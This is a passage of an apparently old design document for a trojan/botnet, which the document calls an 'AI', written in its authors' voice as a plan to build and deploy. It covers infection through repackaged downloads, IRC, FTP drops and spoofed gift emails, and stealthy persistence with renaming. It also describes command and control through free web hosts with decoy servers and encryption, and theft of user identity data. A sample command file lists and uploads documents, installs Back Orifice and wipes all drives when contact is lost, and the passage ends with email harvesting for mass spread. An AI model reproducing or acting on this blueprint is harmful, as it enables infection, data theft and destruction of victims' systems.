Part III: Inner workings
========================
This section will try to explain consideration that should be taken,
technical specifications etc. It is aimed at people who understand the
underlying technology. It is mainly aimed at programmers that know
their stuff.
Initial infection
-----------------
- Repackage bots
Robots that will download executables from frequently visited sites
(Tucows etc.), and repackage it to contain the package. These bots
could be instructed to visit certain sites more frequent than others
and to target certain files. These bots should have the ability the
decompress distributions, repackage, and compress it as well.
- DCCsend bot
Robots on multiple IRC channels that will at random DCC the package to
clients that are detected running the de facto standard Windows client
(Mirc). Robots could be written with intelligence to con users to
accept the DCC. Bots could be situated in "Warez" channels, spreading
the repackaged commercial software.
- FTP put bot
Robots that will search the Internet for FTP servers with writable
/pub and /incoming directories, and drop the package in those
directories.
- Mail bot
These bots will be not unlike the mass mailer programs, mailing the
package to many individuals, posing as representatives from various
organizations such as Hotmail, Geocities etc, with package as free
"gift". This "gift" can be something like a new screensaver or HTML
writer.
Note that all transport mechanism implies that the receiver is
connected to the Internet on some way or another.
The AI itself can be coded in different forms, so that there will be
hundreds of different code signatures - this will make it difficult
for anti virus vendors to develop a program that will search for code
signatures.
First contact
-------------
When the user downloaded the package, he/she will execute it. The
package will run the normal program, and the AI will also execute. The
AI will install itself within the system, in such a way that it will
always execute at startup. It will also disguise itself, by renaming
itself to a non-suspect filename. This name will contain random
letters, and should not be longer than 6 letters. At every restart, it
will rename itself again (and modify the startup correctly). It could
also modify the startup method -e.g. modifying the registry, or the
win.ini.
The AI must be able to detect itself. This will ensure that the AI
will not be installed every time the package is executed. This can be
done by "marking" the host - it will not reveal where the AI is
located, just that it has been infected. This "marking" will
furthermore hamper the detection process later on, as this mark has to
be removed before the host can be re-infected for lab purposes.
The AI will proceed to determine if it is situated in an online
environment (it can open a session to a machine on the Internet). If
direct connection is not possible, it will determine if a proxy is
present (registry), and use the proxy to connect to the Internet.
Ideally, the AI will monitor network traffic with destination port 80,
and determine the best path out - be that direct, or via a proxy. As
this could involve installing a custom packet driver, the AI could
monitor CPU load across different applications, and register an
online situation when a browser (IE or Netscape) uses CPU load.
The AI will only try to make a connection if it can safely determine
that there is an already open connection to the 'net.
The AI will contain a list of web servers that will be ready to accept
the registration. For every AI, this list will contain random
preferences. The AI will try to contact the web server with higher
preference and send a report to the web server. The AI will send the
report in the same way that browsers upload files to web servers. This
list could typical contain up to 75 different locations.
The initial report that the AI will send to the web server should
contain:
-Self generated serial number
-DNS name / IP
-Firewalled Y/N
-Proxies
-DHCP Y/N
-Interface information (type, speed etc)
-Platform (e.g. CPU, memory)
-Browser support (Netscape / IE)
-Mail support (Outlook, Eudora etc)
-Registered programs
-Real name
-Username
-Email address
Most of this information can be extracted from the registry. The AI
will save this report in a file with the same name as the self
generated serial number.
The AI will try to download a file called "counter". This file will
contain a number. It will increment this number, and upload the file,
with the same filename. This file is thus a counter of the number of
infected hosts that could reach the server(s). A "counter.lock" file
can be used to ensure that two hosts do not access the file at the
same time. A host that encounters a lock file will wait for a
predefined period of time, and retry.
It is *very* important that the virus is not discovered during the
initial infection stage. Care should be take that the AI should under
no circumstances reveal itself. It should rather end its life than
reveal itself.
Using different spreading mechanism, and different "host programs"
should ensure that the AI could still reproduce. The packages will
still contain the AI, and infection can spread along with it.
The web servers
-------------
These are the web servers where the AIs will register, and receive
commands from. The web servers should all be public accessible web
servers, where free webspace can be obtained - e.g. Geocities, Iname,
Yahoo, to name a few. Multiple accounts should be registered on every
server.
Commands "dropped" for the AIs should be replicated between the
servers. This means that all commands should be present on all
servers, so that a certain AI can pick up commands from different
servers (in the case that one server might be down, blocked, or
administratively taken down).
Replicating the data can be easily automated if the web server accepts
FTP connections. If the sever does not, a PERL script can be build to
interrogate web interfaces. As it is envisaged that this virus will be
controlled by a group of people, a CRC checksum of all command files
could be stored on the web server. Replication will only happen when
CRC checksums between web servers does not match.
To hamper detection, fake web servers can be included in the list. The
AI will know that these sites does not contain a "drop zone", and will
not attempt to retrieve commands or drop reports to it. The only
purpose of these fake sites will be to cause confusion to anti virus
vendors once the AI is detected.
More information on the format and distribution of "dropped" commands
will follow.
Day to day activity of the AI
-----------------------------
When the AI detects that it can open a pipe to its web server of
choice (as explained in the "First Contact" section), it will try to
download a file called ".cmd.". Failing this, it
will try to download a file named "general.cmd.". The first
file is a file containing specific commands for the AI. The AI will
internally keep count of command files that was received and executed
and will only act on command files with counters larger than its saved
counter. The second file is a file that is used for sending commands
to be executed by all AIs. It is envisaged that this will be the
default action, unless the controller have something specific in mind
for a particular host.
Both these files contain commands for the AI(s). After downloading the
command file, the AI will execute the commands. If the AI acts on
general commands it will increment a counter within a file called
"". By doing this, the controller can see
how many AIs have already executed the general command. Access to the
command counter file can also be regulated by a lock file.
An instruction set could contain the following commands:
-remove()
Remove the AI from memory, hard drives and IP stack.
- mass_destruct()
Erase all data, and reboot.
- sync (time)
Will command AI to periodical fetch new command file every "time"
minute. The AI will still only contact the server when it can do so
safely.
- batch begin, batch end
All commands between batch begin and batch end will be executed as a
batch job. Commands between "begin" and "end" should be chosen to
redirect its output to files - see the example.
-download (filename, local name)
Downloads from web server, and save it as on
the host's hard drive.
- upload (local file,remote file)
Uploads to web server, saving it as on the
server.
-update (local file)
The AI will download and update itself. This could be
useful when anti virus vendors start to realize the threat.
-spread (count, rate)
See section on secondary infection.
-default begin (count), default end.
Commands between default begin and default end will be executed if the
AI cannot connect to servers in succession. (it will still
only try to reach these servers when it detects that it is in an
online environment)
The command set can obviously be expanded to include typical BO
commands. An example of an AI command file could be:
default begin 4
 c;mass_destruct
default end
sync 15
batch begin
dir c:\*.doc /s > c:\dirall.docs
upload c:\dirall.docs 16643dhas13.all_docs
del c:\dirall.docs
download bo.exe c:\winnt\system32\taskbar.exe
c:\winnt\system32\taskbar.exe
batch end
spread 25000,5
END
In this example the AI will erase all data on all drives when contact
are lost with its top 4 servers. It will try to download command files
every 15 minutes. It will upload a file called 16643dhas13.all_docs
containing a listing of all .DOC files on the C: drive. It will
download and install Back Orifice. The "spread" command will be
discussed in the next section.
Note the "END" at the end of the command file. If the AI cannot find
"END" at the end of the command file, it must regards the command file
as incomplete, and not execute any commands.
With minimal effort, command file and reports can be encrypted.
Encrypting the data should make it much more difficult to determine
the mechanics of this virus. It will also help to ensure that anti
virus vendors cannot send commands to the web servers to automatically
erase the AI - such as "remove()".
Combining encryption with the "default begin default end" command
makes for a powerful concept. If the host is left on the 'net, it can
be remotely controlled. If the sites that the AI is visiting is taken
down, the host goes down with the AI. Anti virus vendors, security
exports cannot talk to the AI, because communication is encrypted. The
only way to be totaly safe is to disconnect the host permanently from
the Internet.
Secondary infection
-------------------
Every AI that registers will increment the "counter" file. The
"spread" command act on the number contained in the "counter" file. If
the counter exceeds , secondary infection procedures are
executed at rate :
The AI will "farm" email addresses from known mail clients - e.g.
Outlook, Eudora and Netscape mail. It will extract mailer information
(SMTP gateway, local email address owner etc.) from the registry, or
directly from the mail client. The AI will disregard email addresses
that is within the same domain as the host (that is - it will never
send email to bob@bobby.com, if the local domain is bobby.com). This
is to minimize the chance that the virus will be discovered by
inter-human contact.
The AI will start sending out packages (see Part II) to number
of persons per day. Each message sent out will contain different
subject lines - e.g. "check this out", "have a look", "for your
information" etc. If the host contains less than email
addresses, it will send it to the maximum number of recipients, given
that they are not within the same domain. Note that via the command
file, the rate of infection can be controlled.
Let's assume that we have an initial install base of 10000 (which is
pretty conservative). If we send a spread index of 7 the virus/Trojan
will spread like this (assuming that the receiver is not yet
infected):
1st iteration: 70,000
2nd iteration: 490,000
3rd iteration: 3,430,000
4th iteration: 24,010,000
If we assume that only 75% of receivers will have an OS that is
susceptible for this virus/Trojan, and that only 50% of those will
execute the attachment we are still looking at:
1st iteration: 26,250
2nd iteration: 68,906
3rd iteration: 180,878
4th iteration: 475,807
at which time it will become difficult for the web servers to keep up.
Keep in mind that the 4th iteration can be reached within hours, where
after a mass_destruct() signal could possibly be issued.
Continue to Part IV: QWRNA
(questions we rather not ask)